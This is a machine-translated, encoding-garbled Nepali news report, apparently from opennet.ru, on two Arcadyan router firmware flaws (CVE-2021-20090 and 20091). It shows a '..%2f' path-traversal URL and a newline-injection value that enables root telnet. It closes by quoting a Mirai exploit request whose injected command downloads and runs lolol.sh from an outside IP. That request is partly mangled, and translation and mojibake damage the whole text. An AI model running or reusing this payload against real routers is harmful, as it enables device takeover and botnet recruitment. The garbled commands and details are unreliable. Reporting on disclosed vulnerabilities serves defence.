рдШрд░ рд░рд╛рдЙрдЯрд░рд╣рд░реВ рд╡рд┐рд░реБрджреНрдз рдиреЗрдЯрд╡рд░реНрдХрдорд╛ рдареВрд▓реЛ рдЖрдХреНрд░рдордг рд░реЗрдХрд░реНрдб рдЧрд░рд┐рдПрдХреЛ рдЫ рдЬрд╕рдХреЛ рдлрд░реНрдорд╡реЗрдпрд░рд▓реЗ Arcadyan рдХрдореНрдкрдиреАрдмрд╛рдЯ HTTP рд╕рд░реНрднрд░ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджрдЫред рдпрдиреНрддреНрд░рд╣рд░реВрдорд╛ рдирд┐рдпрдиреНрддреНрд░рдг рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди, рджреБрдИ рдХрдордЬреЛрд░реАрд╣рд░реВрдХреЛ рд╕рдВрдпреЛрдЬрди рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рдиреНрдЫ рдЬрд╕рд▓реЗ рдореВрд▓ рдЕрдзрд┐рдХрд╛рд░рд╣рд░реВрд╕рдБрдЧ рдордирдорд╛рдиреА рдХреЛрдбрдХреЛ рд░рд┐рдореЛрдЯ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрдирд▓рд╛рдИ рдЕрдиреБрдорддрд┐ рджрд┐рдиреНрдЫред рд╕рдорд╕реНрдпрд╛рд▓реЗ Arcadyan, ASUS рд░ Buffalo рдмрд╛рдЯ ADSL рд░рд╛рдЙрдЯрд░рд╣рд░реВрдХреЛ рд╡реНрдпрд╛рдкрдХ рджрд╛рдпрд░рд╛рд▓рд╛рдИ рдЕрд╕рд░ рдЧрд░реНрдЫ, рд╕рд╛рдереИ Beeline рдмреНрд░рд╛рдиреНрдбрд╣рд░реВ (рд╕рдорд╕реНрдпрд╛ рд╕реНрдорд╛рд░реНрдЯ рдмрдХреНрд╕ рдлреНрд▓реНрдпрд╛рд╕рдорд╛ рдкреБрд╖реНрдЯрд┐ рдЧрд░рд┐рдПрдХреЛ рдЫ), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone рд░ рдЕрдиреНрддрд░реНрдЧрдд рдЖрдкреВрд░реНрддрд┐ рдЧрд░рд┐рдПрдХрд╛ рдЙрдкрдХрд░рдгрд╣рд░реВред рдЕрдиреНрдп рдЯреЗрд▓рд┐рдХрдо рдЕрдкрд░реЗрдЯрд░рд╣рд░реВред рдпреЛ рдиреЛрдЯ рдЧрд░рд┐рдПрдХреЛ рдЫ рдХрд┐ рд╕рдорд╕реНрдпрд╛ Arcadyan рдлрд░реНрдорд╡реЗрдпрд░рдорд╛ 10 рд╡рд░реНрд╖ рднрдиреНрджрд╛ рдмрдвреАрдХреЛ рд▓рд╛рдЧрд┐ рд░рд╣реЗрдХреЛ рдЫ рд░ рдпрд╕ рд╕рдордпрдорд╛ 20 рд╡рд┐рднрд┐рдиреНрди рдирд┐рд░реНрдорд╛рддрд╛рд╣рд░реВрдмрд╛рдЯ рдХрдореНрддрд┐рдорд╛ 17 рдЙрдкрдХрд░рдг рдореЛрдбреЗрд▓рд╣рд░реВрдорд╛ рдорд╛рдЗрдЧреНрд░реЗрдЯ рдЧрд░реНрди рд╡реНрдпрд╡рд╕реНрдерд┐рдд рднрдПрдХреЛ рдЫред
рдкрд╣рд┐рд▓реЛ рдЬреЛрдЦрд┐рдо, CVE-2021-20090, рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдмрд┐рдирд╛ рдХреБрдиреИ рдкрдирд┐ рд╡реЗрдм рдЗрдиреНрдЯрд░рдлреЗрд╕ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдкрд╣реБрдБрдЪ рдЧрд░реНрди рд╕рдореНрднрд╡ рдмрдирд╛рдЙрдБрдЫред рдЬреЛрдЦрд┐рдордХреЛ рд╕рд╛рд░ рдпреЛ рд╣реЛ рдХрд┐ рд╡реЗрдм рдЗрдиреНрдЯрд░рдлреЗрд╕рдорд╛, рдЫрд╡рд┐рд╣рд░реВ, CSS рдлрд╛рдЗрд▓рд╣рд░реВ рд░ JavaScript рд╕реНрдХреНрд░рд┐рдкреНрдЯрд╣рд░реВ рдкрдард╛рдЗрдПрдХрд╛ рдХреЗрд╣реА рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реАрд╣рд░реВ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдмрд┐рдирд╛ рдкрд╣реБрдБрдЪрдпреЛрдЧреНрдп рдЫрдиреНред рдпрд╕ рдЕрд╡рд╕реНрдерд╛рдорд╛, рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реАрд╣рд░реВ рдЬрд╕рдХреЛ рд▓рд╛рдЧрд┐ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдмрд┐рдирд╛ рдкрд╣реБрдБрдЪ рдЕрдиреБрдорддрд┐ рджрд┐рдЗрдПрдХреЛ рдЫ рдкреНрд░рд╛рд░рдореНрднрд┐рдХ рдорд╛рд╕реНрдХ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдЬрд╛рдБрдЪ рдЧрд░рд┐рдиреНрдЫред рдЕрднрд┐рднрд╛рд╡рдХ рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реАрдорд╛ рдЬрд╛рдирдХрд╛ рд▓рд╛рдЧрд┐ рдкрдерд╣рд░реВрдорд╛ "../" рд╡рд░реНрдгрд╣рд░реВ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдЧрд░реНрджрд╛ рдлрд░реНрдорд╡реЗрдпрд░рд▓реЗ рд░реЛрдХ рд▓рдЧрд╛рдПрдХреЛ рдЫ, рддрд░ "..%2f" рд╕рдВрдпреЛрдЬрди рдкреНрд░рдпреЛрдЧ рдЧрд░реНрди рдЫреЛрдбрд┐рдПрдХреЛ рдЫред рдпрд╕рд░реА, "http://192.168.1.1/images/..%2findex.htm" рдЬрд╕реНрддрд╛ рдЕрдиреБрд░реЛрдзрд╣рд░реВ рдкрдард╛рдЙрдБрджрд╛ рд╕реБрд░рдХреНрд╖рд┐рдд рдкреГрд╖реНрдард╣рд░реВ рдЦреЛрд▓реНрди рд╕рдореНрднрд╡ рдЫред
рджреЛрд╕реНрд░реЛ рдЬреЛрдЦрд┐рдо, CVE-2021-20091, рдПрдХ рдкреНрд░рдорд╛рдгреАрдХреГрдд рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рд▓рд╛рдИ рд╡рд┐рд╢реЗрд╖ рд░реВрдкрдорд╛ рдврд╛рдБрдЪрд╛ рдЧрд░рд┐рдПрдХрд╛ рдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░рд╣рд░реВ app_abstract.cgi рд╕реНрдХреНрд░рд┐рдкреНрдЯрдорд╛ рдкрдард╛рдПрд░ рдпрдиреНрддреНрд░рдХреЛ рдкреНрд░рдгрд╛рд▓реА рд╕реЗрдЯрд┐рдЩрд╣рд░реВрдорд╛ рдкрд░рд┐рд╡рд░реНрддрди рдЧрд░реНрди рдЕрдиреБрдорддрд┐ рджрд┐рдиреНрдЫ, рдЬрд╕рд▓реЗ рдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░рд╣рд░реВрдорд╛ рдирдпрд╛рдБ рд▓рд╛рдЗрди рдХреНрдпрд╛рд░реЗрдХреНрдЯрд░рдХреЛ рдЙрдкрд╕реНрдерд┐рддрд┐ рдЬрд╛рдБрдЪ рдЧрд░реНрджреИрдиред ред рдЙрджрд╛рд╣рд░рдгрдХрд╛ рд▓рд╛рдЧрд┐, рдкрд┐рдЩ рд╕рдЮреНрдЪрд╛рд▓рди рдЧрд░реНрджрд╛, рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд▓реЗ рдлрд┐рд▓реНрдбрдорд╛ тАЬ192.168.1.2%0AARC_SYS_TelnetdEnable=1тАЭ рдорд╛рди рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдЧрд░реНрди рд╕рдХреНрдЫ IP рдареЗрдЧрд╛рдирд╛ рдЬрд╛рдБрдЪ рдЧрд░рд┐рдБрджреИ, рд░ рд╕реНрдХреНрд░рд┐рдкреНрдЯ, рд╕реЗрдЯрд┐рдЩ рдлрд╛рдЗрд▓ рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реНрджрд╛ /tmp/etc/config/ред .glbcfg рд▓реЗ "AARC_SYS_TelnetdEnable=1" рд▓рд╛рдИ рдпрд╕рдорд╛ рд▓реЗрдЦреНрдиреЗрдЫ ", рдЬрд╕рд▓реЗ telnetd рд╕рд░реНрднрд░рд▓рд╛рдИ рд╕рдХреНрд░рд┐рдп рдЧрд░реНрджрдЫ, рдЬрд╕рд▓реЗ рд░реВрдЯ рдЕрдзрд┐рдХрд╛рд░рд╣рд░реВрд╕рдБрдЧ рдЕрдкреНрд░рддрд┐рдмрдиреНрдзрд┐рдд рдХрдорд╛рдгреНрдб рд╢реЗрд▓ рдкрд╣реБрдБрдЪ рдкреНрд░рджрд╛рди рдЧрд░реНрджрдЫред рддреНрдпрд╕реНрддреИ, AARC_SYS рдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░ рд╕реЗрдЯ рдЧрд░реЗрд░, рддрдкрд╛рдЗрдБ рдкреНрд░рдгрд╛рд▓реАрдорд╛ рдХреБрдиреИ рдкрдирд┐ рдХреЛрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрди рд╕рдХреНрдиреБрд╣реБрдиреНрдЫред рдкрд╣рд┐рд▓реЛ рдХрдордЬреЛрд░реАрд▓реЗ рдпрд╕рд▓рд╛рдИ "/images/..%2fapply_abstract.cgi" рдХреЛ рд░реВрдкрдорд╛ рдкрд╣реБрдБрдЪ рдЧрд░реЗрд░ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдмрд┐рдирд╛ рд╕рдорд╕реНрдпрд╛рдЧреНрд░рд╕реНрдд рд▓рд┐рдкрд┐ рдЪрд▓рд╛рдЙрди рд╕рдореНрднрд╡ рдмрдирд╛рдЙрдБрдЫред
рдХрдордЬреЛрд░реАрд╣рд░реВрдХреЛ рд╢реЛрд╖рдг рдЧрд░реНрди, рдЖрдХреНрд░рдордгрдХрд░реНрддрд╛рд▓реЗ рд╡реЗрдм рдЗрдиреНрдЯрд░рдлреЗрд╕ рдЪрд▓рд┐рд░рд╣реЗрдХреЛ рдиреЗрдЯрд╡рд░реНрдХ рдкреЛрд░реНрдЯрдорд╛ рдЕрдиреБрд░реЛрдз рдкрдард╛рдЙрди рд╕рдХреНрд╖рдо рд╣реБрдиреБрдкрд░реНрдЫред рдЖрдХреНрд░рдордгрдХреЛ рдлреИрд▓рд╛рд╡рдЯрдХреЛ рдЧрддрд┐рд╢реАрд▓рддрд╛рдХреЛ рдЖрдзрд╛рд░рдорд╛, рдзреЗрд░реИ рдЕрдкрд░реЗрдЯрд░рд╣рд░реВрд▓реЗ рд╕рдорд░реНрдерди рд╕реЗрд╡рд╛рджреНрд╡рд╛рд░рд╛ рд╕рдорд╕реНрдпрд╛рд╣рд░реВрдХреЛ рдирд┐рджрд╛рдирд▓рд╛рдИ рд╕рд░рд▓ рдмрдирд╛рдЙрди рдмрд╛рд╣реНрдп рдиреЗрдЯрд╡рд░реНрдХрдмрд╛рдЯ рдЖрдлреНрдиреЛ рдЙрдкрдХрд░рдгрд╣рд░реВрдорд╛ рдкрд╣реБрдБрдЪ рдЫреЛрдбреНрдЫрдиреНред рдпрджрд┐ рдЗрдиреНрдЯрд░рдлреЗрд╕рдорд╛ рдкрд╣реБрдБрдЪ рдЖрдиреНрддрд░рд┐рдХ рдиреЗрдЯрд╡рд░реНрдХрдорд╛ рдорд╛рддреНрд░ рд╕реАрдорд┐рдд рдЫ рднрдиреЗ, "DNS рд░рд┐рдмрд╛рдЗрдиреНрдбрд┐рдЩ" рдкреНрд░рд╡рд┐рдзрд┐ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдмрд╛рд╣реНрдп рдиреЗрдЯрд╡рд░реНрдХрдмрд╛рдЯ рдЖрдХреНрд░рдордг рдЧрд░реНрди рд╕рдХрд┐рдиреНрдЫред Mirai botnet рдорд╛ рд░рд╛рдЙрдЯрд░рд╣рд░реВ рдЬрдбрд╛рди рдЧрд░реНрди рдХрдордЬреЛрд░реАрд╣рд░реВ рдкрд╣рд┐рд▓реЗ рдиреИ рд╕рдХреНрд░рд┐рдп рд░реВрдкрдорд╛ рдкреНрд░рдпреЛрдЧ рднрдЗрд░рд╣реЗрдХрд╛ рдЫрдиреН: POST /images/..%2fapply_abstract.cgi HTTP/1.1 рдЬрдбрд╛рди: рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛-рдПрдЬреЗрдиреНрдЯ рдмрдиреНрдж рдЧрд░реНрдиреБрд╣реЛрд╕реН: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5=&ARC_address212.192.241.7 0%1A ARC_SYS_TelnetdEnable=0&% 212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
рд╕реНрд░реЛрдд: opennet.ru